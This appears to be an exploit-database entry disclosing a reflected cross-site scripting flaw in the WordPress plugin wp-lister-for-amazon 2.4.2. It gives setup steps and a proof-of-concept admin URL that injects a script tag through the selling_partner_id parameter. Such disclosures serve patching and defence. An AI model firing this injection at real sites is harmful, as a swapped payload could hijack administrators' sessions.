Share
## https://sploitus.com/exploit?id=WPEX-ID:460A01E5-7CE5-4D49-B068-A93EA1FBA0E3
1. Install and activate WooCommerce (dependency, no setup required)
2. Install and activate the vulnerable plugin (wp-lister-for-amazon 2.4.2)

Make a logged-in admin and open the following URL:

https://example.com/wp-admin/admin.php?page=wpla-settings&tab=accounts&spapi_oauth_code=x&selling_partner_id=xxx"><script>alert(`xss`)</script>